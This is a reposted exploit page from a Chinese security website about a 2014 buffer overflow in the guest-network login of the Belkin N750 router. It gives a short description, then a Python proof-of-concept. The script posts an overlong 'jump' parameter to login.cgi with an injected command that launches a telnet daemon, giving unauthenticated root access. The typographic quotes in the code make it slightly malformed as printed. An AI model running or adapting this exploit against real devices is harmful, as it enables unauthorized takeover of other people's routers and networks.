首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Belkin n750 jump login Parameter Buffer Overflow Exploit
来源:mv@integrity.pt 作者:MarcoVaz 发布时间:2014-11-11  
"""
   
A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m, allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network.
   
Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router.
   
"""
#!/usr/bin/python
#Title : Belkin n750 buffer overflow in jump login parameter
#Date : 28 Jan 2014
#Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
#Testd on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)
   
import httplib
   
headers = {}
body= “GO=&jump=+ “a”*1379 +%3b+ /usr/sbin/utelnetd -d” +%3b&pws=\n\n”
conn = httplib.HTTPConnection(“192.168.169.1″,8080)
conn.request(“POST”, “/login.cgi”, body, headers)
response = conn.getresponse()
data = response.read()
print data

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Citrix NetScaler SOAP Handler
·PicsArt Photo Studio For Andro
·i.Mage Local Crash Proof of Co
·ManageEngine Eventlog Analyzer
·i.Hex Local Crash Proof of Con
·tnftp "savefile" Arbitrary Com
·i-FTP Buffer Overflow SEH Expl
·Visual Mining NetCharts Server
·X7 Chat 2.0.5 lib/message.php
·Internet Explorer 8 MS14-035 U
·Linux/x86 Add map in /etc/host
·IP.Board 3.4.7 SQL Injection
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved